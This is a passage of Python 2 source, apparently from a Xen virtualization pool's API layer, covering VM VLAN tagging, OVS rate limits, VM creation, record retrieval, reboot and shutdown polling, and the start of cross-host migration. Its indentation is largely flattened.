@param session: session of RPC.
@param vm_ref: uuid
        @param param_type: rate/burst; rate is the rate (kbps) of the VIF port controlled by OVS,
                    burst (kbps) is the burst allowance above that rate.
@param eth_num: eth_num of VIF
@param value: VIF's rate(kbps)
@return: True | False.
@rtype: dict.
'''
xd = XendDomain.instance()
dominfo = xd.get_vm_by_uuid(vm_ref)
domname = dominfo.getName()
log.debug('VM_set_%s:%s rate:%s' % ( param_type, eth_num, value))
dominfo.set_rate(param_type, int(eth_num), value) # ovs_cmd
        #self._VM_get_other_config(session, vm_ref) # in order to convert other_config
dominfo.info.setdefault('other_config',{})
tag_list = dominfo.info['other_config'].setdefault(param_type,{})
dominfo.info['other_config'][param_type][eth_num] = value
return self._VM_save(dominfo)
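    # dominfo.set_rate() ultimately drives OVS port policing; a rough command-line
    # equivalent (assumed, for illustration only) is:
    #   ovs-vsctl set interface vif<domid>.<eth_num> ingress_policing_rate=<kbps>
    #   ovs-vsctl set interface vif<domid>.<eth_num> ingress_policing_burst=<kbps>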
#add by wufan
def VM_set_all_tag(self, session, vm_ref, tag_list=None):
'''
@author: wuyuewen
@summary: Set all VIF's tag(VLAN-ID), this attribute stored in VM's other_config field.
@param session: session of RPC.
@param vm_ref: uuid
        @param tag_list: dict of tag for each VIF, the structure is {eth_num : tag_num}, e.g. {0:1, 1:2}
@return: True | False
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_all_tag(session, vm_ref, tag_list)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_all_tag', vm_ref, tag_list)
else:
return self._VM_set_all_tag(session, vm_ref, tag_list)
#add by wufan
def _VM_set_all_tag(self, session, vm_ref, tag_list=None):
'''
@author: wuyuewen
@summary: Internal method. Set all VIF's tag(VLAN-ID), this attribute stored in VM's other_config field.
@param session: session of RPC.
@param vm_ref: uuid
        @param tag_list: dict of tag for each VIF, the structure is {eth_num : tag_num}, e.g. {0:1, 1:2}
@return: True | False
@rtype: dict.
'''
log.debug('set vm all tag')
if tag_list is None:
# xd = XendDomain.instance()
# dominfo = xd.get_vm_by_uuid(vm_ref)
# log.debug('dom info %s' % dominfo.info)
vif_refs = self._VM_get_VIFs(session, vm_ref).get('Value')
for vif_ref in vif_refs:
tag = self._VM_get_tag(session, vm_ref, vif_ref).get('Value')
#log.debug('tag:%s' % str(tag))
self._VM_set_tag( session, vm_ref, vif_ref, tag)
self._VM_update_tag(session, vm_ref, vif_refs)
else:
#tag_list is a dict
#log.debug('tag_list:%s' % tag_list)
for eth_num, tag in tag_list.items():
self._VM_set_tag_by_ethnum(session, vm_ref, eth_num, tag)
return xen_api_success_void()
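    # Hedged usage sketch: self._VM_set_all_tag(session, vm_ref, {0: 100, 1: 200})
    # puts eth0 on VLAN 100 and eth1 on VLAN 200; with tag_list=None the tags
    # cached in other_config are read back and re-applied to each VIF.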
def VM_set_tag(self, session, vm_ref, vif_ref, value, ovs=None):
'''
@author: wuyuewen
@summary: Set VIF's tag(VLAN-ID), this attribute stored in VM's other_config field.
@param session: session of RPC.
@param vm_ref: uuid
@param vif_ref: VIF uuid
@param value: VIF's tag number(VLAN-ID), default number is -1(VLAN not used).
@return: True | False
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_tag(session, vm_ref, vif_ref, value, ovs)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_tag', vm_ref, vif_ref, value, ovs)
else:
return self._VM_set_tag(session, vm_ref, vif_ref, value, ovs)
#original by wuyuewen
#def _VM_set_tag(self, session, vm_ref, value):
# xd = XendDomain.instance()
# dominfo = xd.get_vm_by_uuid(vm_ref)
# domname = dominfo.getName()
# tag = self._VM_get_tag(session, vm_ref).get('Value')
# if tag:
# log.debug('Set vm(%s) vlan: %s' % (domname, value))
# dominfo.set_tag(value)
# return self._VM_add_to_other_config(session, vm_ref, "tag", value)
#add by wufan
def _VM_set_tag(self, session, vm_ref, vif_ref, value, ovs):
'''
@author: wuyuewen
@summary: Internal method. Set VIF's tag(VLAN-ID), this attribute stored in VM's other_config field.
@param session: session of RPC.
@param vm_ref: uuid
@param vif_ref: VIF uuid
@param value: VIF's tag number(VLAN-ID), default number is -1(VLAN not used).
@return: True | False
@rtype: dict.
'''
xennode = XendNode.instance()
xenapi = self._get_XendAPI_instance()
xd = XendDomain.instance()
dominfo = xd.get_vm_by_uuid(vm_ref)
domname = dominfo.getName()
if not xd.is_valid_dev("vif", vif_ref):
return xen_api_error(['VIF_NOT_EXISTS'])
device = self.VIF_get_device(session, vif_ref).get('Value')
bridge = xd.get_dev_property_by_uuid('vif', vif_ref, 'bridge')
# network_org = xd.get_dev_property_by_uuid('vif', vif_ref, 'network')
log.debug('Set vm(%s) %s vlan: %s ovs: %s bridge: %s' %(domname, str(vif_ref), value, ovs, bridge))
# log.debug('vif_ref:%s VM_set_tag:%s vlanid:%s' % (vif_ref, device, value))
eth_num = -1
if device and device.startswith('eth'):
eth_num = device[3:]
else:
vifs = self._VM_get_VIFs(session, vm_ref).get('Value')
if vif_ref in vifs:
eth_num = vifs.index(vif_ref)
if ovs and cmp(ovs, bridge) != 0:
xennode._init_networks()
is_valid_network = xennode.is_valid_network(ovs)
if not is_valid_network:
return xen_api_error(['OVS_NOT_EXISTS'])
network_new = None
list_network_new = xenapi.network_get_by_name_label(session, ovs).get('Value')
if list_network_new:
network_new = list_network_new[0]
dominfo.switch_vif_to_different_ovs_and_set_tag(int(eth_num), value, ovs, bridge)
try:
# rc = self._VIF_set(vif_ref, 'network', network_new, network_org)
rc1 = self._VIF_set(vif_ref, 'bridge', ovs, bridge)
if not rc1:
dominfo.switch_vif_to_different_ovs_and_set_tag(int(eth_num), value, bridge, ovs)
return xen_api_error(['VIF_SET_BRIDGE_ERROR'])
except Exception, e:
dominfo.switch_vif_to_different_ovs_and_set_tag(int(eth_num), value, bridge, ovs)
raise e
else:
dominfo.set_tag(int(eth_num), value) # ovs_cmd
            #self._VM_get_other_config(session, vm_ref) # in order to convert other_config
dominfo.info.setdefault('other_config',{})
dominfo.info['other_config'].setdefault('tag',{})
dominfo.info['other_config']['tag'][eth_num] = value
self._VM_save(dominfo)
return xen_api_success_void()
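    # dominfo.set_tag() corresponds to an OVS access-port VLAN assignment, roughly
    # (assumed, for illustration only): ovs-vsctl set port vif<domid>.<eth_num> tag=<vlan-id>
    # When ovs names a different bridge, the VIF is first moved there and the move
    # is rolled back if updating the VIF's bridge record fails.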
def _VM_set_tag_by_ethnum(self, session, vm_ref, eth_num, value):
'''
@author: wuyuewen
@summary: Internal method. Set VIF's tag(VLAN-ID) by eth_num, this attribute stored in VM's other_config field.
@param session: session of RPC.
@param vm_ref: uuid
@param eth_num: eth_num of VIF
@param value: VIF's tag number(VLAN-ID), default number is -1(VLAN not used).
@return: True | False
@rtype: dict.
'''
xd = XendDomain.instance()
dominfo = xd.get_vm_by_uuid(vm_ref)
domname = dominfo.getName()
log.debug('Set vm(%s) %s vlan:%s' %(domname, str(eth_num), value))
dominfo.set_tag(int(eth_num), value) # ovs_cmd
        #self._VM_get_other_config(session, vm_ref) # in order to convert other_config
dominfo.info.setdefault('other_config',{})
tag_list = dominfo.info['other_config'].setdefault('tag',{})
dominfo.info['other_config']['tag'][eth_num] = value
return self._VM_save(dominfo)
def VM_remove_from_other_config(self, session, vm_ref, key):
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_remove_from_other_config(session, vm_ref, key)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_remove_from_other_config', vm_ref, key)
else:
return self._VM_remove_from_other_config(session, vm_ref, key)
def _VM_remove_from_other_config(self, session, vm_ref, key):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
if dom and 'other_config' in dom.info \
and key in dom.info['other_config']:
del dom.info['other_config'][key]
return self._VM_save(dom)
else:
return xen_api_success_void()
def VM_get_crash_dumps(self, _, vm_ref):
'''
@deprecated: not used
'''
return xen_api_todo()
def verify(self, ip):
'''
@deprecated: not used
'''
try:
proxy = ServerProxy("http://" + ip + ":9363/")
response = proxy.session.login('root')
except socket.error:
return False
else:
if cmp(response['Status'], 'Failure') == 0:
return False
return True
def VM_get_suspend_VDI(self, session, vm_ref):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_suspend_VDI(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_suspend_VDI', vm_ref)
else:
return self._VM_get_suspend_VDI(session, vm_ref)
def _VM_get_suspend_VDI(self, session, vm_ref):
'''
@deprecated: not used
'''
xennode = XendNode.instance()
return xen_api_success(xennode.get_suspend_VDI(vm_ref))
def VM_get_suspend_SR(self, session, vm_ref):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_suspend_SR(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_suspend_SR', vm_ref)
else:
return self._VM_get_suspend_SR(session, vm_ref)
def _VM_get_suspend_SR(self, session, vm_ref):
'''
@deprecated: not used
'''
xennode = XendNode.instance()
return xen_api_success(xennode.get_suspend_SR(vm_ref))
# class methods
def VM_get_all_and_consoles(self, session):
'''
@deprecated: not used
'''
VM_and_consoles = {}
for d in XendDomain.instance().list('all'):
vm_uuid = d.get_uuid()
if cmp(vm_uuid, DOM0_UUID) == 0:
continue
dom = XendDomain.instance().get_vm_by_uuid(vm_uuid)
vm_consoles = []
for console in dom.get_consoles():
vm_consoles.append(console)
VM_and_consoles[vm_uuid] = vm_consoles
return xen_api_success(VM_and_consoles)
# def VM_get_all(self, session):
# refs = self._VM_get_all()
# if BNPoolAPI._isMaster:
# host_ref = XendNode.instance().uuid
# for key in BNPoolAPI.get_hosts():
# if cmp(key, host_ref) != 0:
# ip = BNPoolAPI.get_host_ip(key)
# refs += xen_rpc_call(ip, "VM_get_all")
#
# return xen_api_success(refs)
def VM_get_all(self, session):
'''
@author: wuyuewen
@summary: Get all guest VMs.
@param session: session of RPC.
@return: list of VMs uuid.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
refs = []
refs.extend(self._VM_get_all(session).get('Value'))
for k in BNPoolAPI.get_hosts():
if cmp(k, XendNode.instance().uuid) == 0:
continue
remote_ip = BNPoolAPI.get_host_ip(k)
# log.debug(remote_ip)
refs.extend(xen_rpc_call(remote_ip, 'VM_get_all').get('Value'))
return xen_api_success(refs)
else:
return self._VM_get_all(session)
def _VM_get_all(self, session):
'''
@author: wuyuewen
@summary: Internal method. Get all guest VMs.
@param session: session of RPC.
@return: list of VMs uuid.
@rtype: dict.
'''
refs = [d.get_uuid() for d in XendDomain.instance().list('all')
if d.get_uuid() != DOM0_UUID]
if refs:
return xen_api_success(refs)
else:
return xen_api_success([])
def VM_get_by_name_label(self, session, label):
'''
@author: wuyuewen
@summary: Get VM by VM's name label.
@param session: session of RPC.
@param label: name label of VM
@return: VM.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
refs = []
refs.extend(self._VM_get_by_name_label(session, label)['Value'])
for k in BNPoolAPI.get_hosts():
if cmp(k, XendNode.instance().uuid) == 0:
continue
remote_ip = BNPoolAPI.get_host_ip(k)
refs.extend(xen_rpc_call(remote_ip, 'VM_get_by_name_label', label)['Value'])
return xen_api_success(refs)
else:
return self._VM_get_by_name_label(session, label)
def _VM_get_by_name_label(self, session, label):
'''
@author: wuyuewen
@summary: Internal method. Get VM by VM's name label.
@param session: session of RPC.
@param label: name label of VM
@return: VM.
@rtype: dict.
'''
xendom = XendDomain.instance()
uuids = []
dom = xendom.domain_lookup_by_name_label(label)
if dom:
return xen_api_success([dom.get_uuid()])
return xen_api_success([])
def VM_get_security_label(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
label = dom.get_security_label()
return xen_api_success(label)
def VM_set_security_label(self, session, vm_ref, sec_label, old_label):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
(rc, errors, oldlabel, new_ssidref) = \
dom.set_security_label(sec_label, old_label)
if rc != xsconstants.XSERR_SUCCESS:
return xen_api_error(['SECURITY_ERROR', rc,
xsconstants.xserr2string(-rc)])
if rc == 0:
rc = new_ssidref
return xen_api_success(rc)
def VM_create_on(self, session, vm_struct, host_ref):
'''
@author: wuyuewen
        @summary: A Pool-scope method: create a VM on the given Host in the Pool.
@precondition: vm_struct is legal, vm name not duplicated.
@param session: session of RPC.
@param vm_struct: dict of vm structure
@param host_ref: VM create on which Host.
@return: VM.
@rtype: dict.
@raise xen_api_error: VM name already exists
@raise XendError:
'''
if BNPoolAPI._isMaster:
log.debug(vm_struct)
newuuid = vm_struct.get('uuid', None)
check_uuid = self._VM_create_check_vm_uuid_unique(newuuid)
if not check_uuid:
return xen_api_error(XEND_API_ERROR_VM_UNIQUE_UUID_ERROR)
vm_label = vm_struct.get('nameLabel')
vms = self.VM_get_by_name_label(session, vm_label)
if vms.get('Value'):
return xen_api_error(['VM name already exists', 'VM', vm_label])
else:
if cmp(host_ref, XendNode.instance().uuid) == 0:
response = self._VM_create(session, vm_struct)
domuuid = response.get('Value')
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
response = xen_rpc_call(remote_ip, 'VM_create_on', vm_struct, host_ref)
domuuid = response.get('Value')
if domuuid:
BNPoolAPI.update_data_struct('vm_create', domuuid, host_ref)
return response
else:
response = self._VM_create(session, vm_struct)
domuuid = response.get('Value')
if domuuid:
BNPoolAPI.update_data_struct('vm_create', domuuid, XendNode.instance().uuid)
return response
def VM_create(self, session, vm_struct):
'''
@author: wuyuewen
        @summary: A Host-scope method: create a VM on this Host.
@precondition: vm_struct is legal, vm name not duplicated.
@param session: session of RPC.
@param vm_struct: dict of vm structure
@return: VM.
@rtype: dict.
@raise xen_api_error: VM name already exists
@raise XendError:
'''
if BNPoolAPI._isMaster:
newuuid = vm_struct.get('uuid', None)
check_uuid = self._VM_create_check_vm_uuid_unique(newuuid)
if not check_uuid:
return xen_api_error(XEND_API_ERROR_VM_UNIQUE_UUID_ERROR)
vm_label = vm_struct.get('nameLabel')
vms = self.VM_get_by_name_label(session, vm_label)
if vms.get('Value'):
return xen_api_error(['VM name already exists', 'VM', vm_label])
else:
response = self._VM_create(session, vm_struct)
domuuid = response.get('Value')
if domuuid:
BNPoolAPI.update_data_struct('vm_create', domuuid, XendNode.instance().uuid)
return response
else:
response = self._VM_create(session, vm_struct)
domuuid = response.get('Value')
log.debug("new vm local uuid : %s", domuuid)
if domuuid:
BNPoolAPI.update_data_struct('vm_create', domuuid, XendNode.instance().uuid)
return response
def _VM_create(self, session, vm_struct):
'''
@author: wuyuewen
@summary: Internal method. Create a VM on this Host.
@precondition: vm_struct is legal, vm name not duplicated.
@param session: session of RPC.
@param vm_struct: dict of vm structure
@return: VM.
@rtype: dict.
@raise xen_api_error: VM name already exists
@raise XendError:
'''
xendom = XendDomain.instance()
domuuid = XendTask.log_progress(0, 100,
xendom.create_domain, vm_struct)
return xen_api_success(domuuid)
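    # vm_struct is the dict shape consumed by XendDomain.create_domain; the
    # callers above rely on at least 'uuid' and 'nameLabel' being present.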
def _VM_create_check_vm_uuid_unique(self, newuuid):
if newuuid:
return BNPoolAPI.check_vm_uuid_unique(newuuid)
else:
return True
def VM_create_from_vmstruct(self, session, vm_struct):
'''
@deprecated: not used
'''
xendom = XendDomain.instance()
domuuid = XendTask.log_progress(0, 100,
xendom.create_domain, vm_struct)
return xen_api_success(domuuid)
def VM_create_from_sxp(self, session, path, start_it=False, update_pool_structs=True):
'''
@author: wuyuewen
@summary: Create a VM on this Host from .sxp file.
@precondition: sxp file is legal, vm name not duplicated.
@param session: session of RPC.
@param path: path of sxp file
@param start_it: Start the VM after create, if start_it=True, Host must have enough free memory.
@return: VM.
@rtype: dict.
@raise xen_api_error: VM name already exists
@raise XendError:
'''
# filename = '/home/share/config.sxp'
try:
sxp_obj = sxp.parse(open(path, 'r'))
sxp_obj = sxp_obj[0]
xendom = XendDomain.instance()
domuuid = XendTask.log_progress(0, 100,
xendom.domain_new, sxp_obj)
if update_pool_structs:
BNPoolAPI.update_data_struct('vm_create', domuuid, XendNode.instance().uuid)
if start_it:
# try:
response = self._VM_start(session, domuuid, False, True)
if cmp(response['Status'], 'Failure') == 0:
self._VM_destroy(session, domuuid, False)
return response
# except Exception, exn:
# self._VM_destroy(session, domuuid, False)
# return xen_api_error(['VM_START_FAILED', 'VM', domuuid])
return response
else:
return xen_api_success(domuuid)
except IOError, e:
return xen_api_error(["Unable to read file: %s" % path])
except Exception, exn:
log.exception(exn)
return xen_api_error(['Create from sxp failed!'])
# finally:
# cmd = 'rm -f %s' % path
# doexec(cmd)
# return XendTask.log_progress(0, 100, do_vm_func,
# "domain_start", domuuid, False, False)
# object methods
def VM_get_record(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM's record.
@param session: session of RPC.
@param vm_ref: VM's uuid
@return: VM record
@rtype: dict.
@raise xen_api_error: VM not exists
'''
#log.debug('=================vm_get_record:%s' % vm_ref)
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_record(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_record', vm_ref)
else:
return self._VM_get_record(session, vm_ref)
def _VM_get_record(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM's record.
@param session: session of RPC.
@param vm_ref: VM's uuid
@return: VM record
@rtype: dict.
@raise xen_api_error: VM not exists
'''
xendom = XendDomain.instance()
xeninfo = xendom.get_vm_by_uuid(vm_ref)
xennode = XendNode.instance()
if not xeninfo:
log.debug("can not find vm:" + vm_ref)
return xen_api_error(['HANDLE_INVALID', 'VM', vm_ref])
domid = xeninfo.getDomid()
dom_uuid = xeninfo.get_uuid()
record = {
'uuid': dom_uuid,
'power_state': xeninfo.get_power_state(),
'name_label': xeninfo.getName(),
'name_description': xeninfo.getNameDescription(),
'user_version': 1,
'is_a_template': xeninfo.info['is_a_template'],
'is_local_vm' : self._VM_get_is_local_vm(session, vm_ref).get("Value", True),
'ip_addr' : xeninfo.getDomainIp(),
'MAC' : xeninfo.getDomainMAC(),
'auto_power_on': xeninfo.info['auto_power_on'],
'resident_on': XendNode.instance().uuid,
'memory_static_min': xeninfo.get_memory_static_min(),
'memory_static_max': xeninfo.get_memory_static_max(),
'memory_dynamic_min': xeninfo.get_memory_dynamic_min(),
'memory_dynamic_max': xeninfo.get_memory_dynamic_max(),
'VCPUs_params': xeninfo.get_vcpus_params(),
'VCPUs_at_startup': xeninfo.getVCpuCount(),
'VCPUs_max': xeninfo.getVCpuCount(),
'actions_after_shutdown': xeninfo.get_on_shutdown(),
'actions_after_reboot': xeninfo.get_on_reboot(),
'actions_after_suspend': xeninfo.get_on_suspend(),
'actions_after_crash': xeninfo.get_on_crash(),
'consoles': xeninfo.get_consoles(),
'VIFs': xeninfo.get_vifs(),
'VBDs': xeninfo.get_vbds(),
'VTPMs': xeninfo.get_vtpms(),
'DPCIs': xeninfo.get_dpcis(),
'DSCSIs': xeninfo.get_dscsis(),
'DSCSI_HBAs': xeninfo.get_dscsi_HBAs(),
'PV_bootloader': xeninfo.info.get('PV_bootloader'),
'PV_kernel': xeninfo.info.get('PV_kernel'),
'PV_ramdisk': xeninfo.info.get('PV_ramdisk'),
'PV_args': xeninfo.info.get('PV_args'),
'PV_bootloader_args': xeninfo.info.get('PV_bootloader_args'),
'HVM_boot_policy': xeninfo.info.get('HVM_boot_policy'),
'HVM_boot_params': xeninfo.info.get('HVM_boot_params'),
'platform': xeninfo.get_platform(),
'PCI_bus': xeninfo.get_pci_bus(),
'tools_version': xeninfo.get_tools_version(),
'other_config': xeninfo.info.get('other_config', {}),
'tags' : xeninfo.info.get('tags', []),
'domid': domid is None and -1 or domid,
'is_control_domain': xeninfo.info['is_control_domain'],
'metrics': xeninfo.get_metrics(),
'cpu_qos': xeninfo.get_cpu_qos(),
'security_label': xeninfo.get_security_label(),
'crash_dumps': [],
'suspend_VDI' : xennode.get_suspend_VDI(dom_uuid),
'suspend_SR' : xennode.get_suspend_SR(dom_uuid),
'connected_disk_SRs' : xennode.get_connected_disk_sr(dom_uuid),
'connected_iso_SRs' : xennode.get_connected_iso_sr(dom_uuid),
'pool_name': xeninfo.info.get('pool_name'),
# 'cpu_pool' : XendCPUPool.query_pool_ref(xeninfo.get_cpu_pool()),
}
#log.debug(record)
return xen_api_success(record)
# def VM_get_record_lite(self, session, vm_ref=''):
# if BNPoolAPI._isMaster:
# hosts = self.host_get_all(session).get('Value', '')
# node = XendNode.instance()
# records = []
# if hosts:
# for host in hosts:
# if cmp(node.uuid, host) == 0:
# records.append(self._VM_get_record_lite(session))
# else:
# host_ip = BNPoolAPI.get_host_ip(host)
# records.append(xen_rpc_call(host_ip, 'VM_get_record_lite', '').get('Value', []))
# return xen_api_success(records)
# else:
# return xen_api_success(self._VM_get_record_lite(session))
def VM_get_record_lite(self, session, vm_ref=''):
'''
@deprecated: not used
'''
vms = self._VM_get_all(session).get('Value', [])
retv = []
if vms:
for vm_ref in vms:
xendom = XendDomain.instance()
xeninfo = xendom.get_vm_by_uuid(vm_ref)
# xennode = XendNode.instance()
if not xeninfo:
log.debug("can not find vm:" + vm_ref)
return xen_api_error(['HANDLE_INVALID', 'VM', vm_ref])
# domid = xeninfo.getDomid()
dom_uuid = xeninfo.get_uuid()
record_lite = {'uuid' : dom_uuid,
'power_state' : xeninfo.get_power_state(),
}
# log.debug(record_lite)
retv.append(record_lite)
return xen_api_success(retv)
def VM_clean_reboot(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Attempt to cleanly reboot the specified VM.
This can only be called when the specified VM is in the Running state.
@param session: session of RPC.
@param vm_ref: VM's uuid
@return: True | False
@rtype: dict.
@raise XendError: Bad power state.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
response = self._VM_clean_reboot(session, vm_ref)
response = self._VM_reboot_checkout(session, vm_ref)
# self. _VM_set_all_tag(session, vm_ref)
# self._VM_set_all_rate(session, vm_ref, 'rate')
# self._VM_set_all_rate(session, vm_ref, 'burst')
# self.VM_start_set_IO_limit(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
response = xen_rpc_call(host_ip, "VM_clean_reboot", vm_ref)
return response
else:
response = self._VM_clean_reboot(session, vm_ref)
response = self._VM_reboot_checkout(session, vm_ref)
# self. _VM_set_all_tag(session, vm_ref)
# self._VM_set_all_rate(session, vm_ref, 'rate')
# self._VM_set_all_rate(session, vm_ref, 'burst')
# self.VM_start_set_IO_limit(session, vm_ref)
return response
def _VM_clean_reboot(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Attempt to cleanly reboot the specified VM.
This can only be called when the specified VM is in the Running state.
@param session: session of RPC.
@param vm_ref: VM's uuid
@return: True | False
@rtype: dict.
@raise XendError: Bad power state.
'''
#self._VM_clean_IO_limit_shutdown(session, vm_ref) #add by wufan
xendom = XendDomain.instance()
xeninfo = xendom.get_vm_by_uuid(vm_ref)
XendTask.log_progress(0, 100, xeninfo.shutdown, "reboot")
return xen_api_success_void()
def _VM_reboot_checkout(self, session, vm_ref):
'''
@author: wuyuewen
        @summary: Internal method. Check that the reboot finished: xend assigns a larger domain ID after a reboot, so poll until it exceeds the pre-reboot value.
@param session: session of RPC.
@param vm_ref: VM's uuid
@return: True | False
@rtype: dict.
@raise Exception: Timeout 90 seconds.
'''
domid_old = self.VM_get_domid(session, vm_ref)['Value']
i = 0
flag = False
one_more = True
while True:
i += 1
domid_new = self.VM_get_domid(session, vm_ref)['Value']
            if domid_new and cmp(int(domid_new), int(domid_old)) > 0:
                log.debug('reboot finished: %s, cost time: %s' % (vm_ref, str(i)))
                flag = True
                break
            elif not domid_new or (cmp(i, 90) > 0 and cmp(int(domid_new), -1) == 0):
if one_more:
one_more = False
i -= 6
continue
else:
log.exception('reboot timeout!')
break
else:
time.sleep(1)
continue
return xen_api_success(flag)
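    # The checkout works because xend assigns a new, larger domain ID on every
    # (re)boot: once VM_get_domid exceeds the pre-reboot value the new domain is
    # up. The one_more branch grants roughly 6 extra polls once before declaring
    # a timeout, covering the window where the old domain still shows domid -1.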
def VM_clean_shutdown(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Attempt to cleanly shutdown the specified VM.
This can only be called when the specified VM is in the Running state.
@param session: session of RPC.
@param vm_ref: VM's uuid
@return: True | False
@rtype: dict.
@raise XendError: Bad power state.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
response = self._VM_clean_shutdown(session,vm_ref)
response = self._VM_shutdown_checkout(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
response = xen_rpc_call(host_ip, "VM_clean_shutdown", vm_ref)
return response
else:
response = self._VM_clean_shutdown(session, vm_ref)
response = self._VM_shutdown_checkout(session, vm_ref)
return response
def _VM_clean_shutdown(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Attempt to cleanly shutdown the specified VM.
This can only be called when the specified VM is in the Running state.
@param session: session of RPC.
@param vm_ref: VM's uuid
@return: True | False
@rtype: dict.
@raise XendError: Bad power state.
'''
#self._VM_clean_IO_limit_shutdown(session, vm_ref) #add by wufan
is_a_template = self._VM_get_is_a_template(session, vm_ref).get('Value')
if is_a_template:
return xen_api_error(XEND_API_ERROR_VM_IS_TEMPLATE)
xendom = XendDomain.instance()
xeninfo = xendom.get_vm_by_uuid(vm_ref)
XendTask.log_progress(0, 100, xeninfo.shutdown, "poweroff")
return xen_api_success_void()
def _VM_shutdown_checkout(self, session, vm_ref):
'''
@author: wuyuewen
        @summary: Internal method. Check that the shutdown finished (the domain ID becomes -1 or disappears).
        @param session: session of RPC.
        @param vm_ref: VM's uuid
        @return: True | False
        @rtype: dict.
        @raise Exception: Timeout 60 seconds.
'''
i = 0
time_out = 60
flag = False
while True:
i += 1
# ps_new = self.VM_get_power_state(session, vm_ref)['Value']
domid = self.VM_get_domid(session, vm_ref).get('Value')
# log.debug(ps_new)
if not domid or cmp (int(domid), -1) == 0:
log.debug("shutdown finished: %s, cost time: %s" % (vm_ref, str(i)))
flag = True
break
elif cmp(i, time_out) > 0:
log.exception("shutdown timeout!")
break
else:
time.sleep(1)
continue
return xen_api_success(flag)
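    # Shutdown is detected the opposite way from reboot: VM_get_domid returns -1
    # (or nothing) once the domain is gone; we poll once per second for up to
    # time_out (60) seconds.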
'''
    when a VM is created from a template, migrate the VM to the destination host;
    the VM is shut down, refer to VM_start_on
'''
def VM_change_host(self, session, vm_ref, temp_ref, host_ref, path):
'''
@author: wuyuewen
        @summary: When a VM is created from a template, migrate it to the destination host; refer to VM_create_on_from_template.
        @precondition: VM not running
        @param session: session of RPC.
        @param vm_ref: VM's uuid
        @param temp_ref: VM template uuid
        @param host_ref: Host to migrate the VM to
@return: True | False
@rtype: dict.
@raise xen_api_error: CHANGE_HOST_ON_FAILED
'''
try:
log.debug("in VM_change_host: %s" % vm_ref)
if BNPoolAPI._isMaster:
if self.VM_get_is_local_vm(session, vm_ref).get('Value'):
return xen_api_success(True)
xennode = XendNode.instance()
master_uuid = xennode.uuid
h_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if not h_ref:
log.exception('Get host by VM failed! BNPoolAPI update_data_struct not sync!')
h_ref = BNPoolAPI.get_host_by_vm(temp_ref)
h_ip = BNPoolAPI.get_host_ip(h_ref)
host_ip = BNPoolAPI.get_host_ip(host_ref)
paths = xennode.get_ha_sr_location()
log.debug(paths)
# if cmp(paths, {}) !=0:
if paths:
for p in paths.values():
# path = os.path.join(p, CACHED_CONFIG_FILE)
path = os.path.join(p, '%s.sxp' % vm_ref)
break
else:
path = ''
log.debug('vm_migrate to ha path: %s' % path)
# else:
# return xen_api_error(['nfs_ha not mounted', NFS_HA_DEFAULT_PATH])
#copy sxp file to nfs
log.debug("<dest ip>, <host ip>: <%s>, <%s>" % (host_ip, h_ip))
xen_rpc_call(h_ip, 'VM_copy_sxp_to_nfs', vm_ref, path)
if cmp(host_ref, master_uuid) == 0 and cmp(master_uuid, h_ref) == 0:
log.debug("-----condition 1-----")
log.debug("vm dest: master, vm now: master")
response = {'Status' : 'Success', 'Value' : vm_ref}
# return xen_api_success(True)
elif cmp(host_ref, master_uuid) == 0 and cmp(master_uuid, h_ref) != 0:
log.debug("-----condition 2-----")
log.debug("vm dest: master, vm now: node")
response = self.VM_create_from_sxp(session, path, False, False)
# log.debug('create from template: %s' % response)
if cmp (response.get('Status'), 'Success') == 0:
xen_rpc_call(h_ip, 'VM_destroy', vm_ref, False, False, False)
# log.debug('destroy : %s' % response)
elif cmp(host_ref, master_uuid) != 0 and cmp(master_uuid, h_ref) == 0:
log.debug("-----condition 3-----")
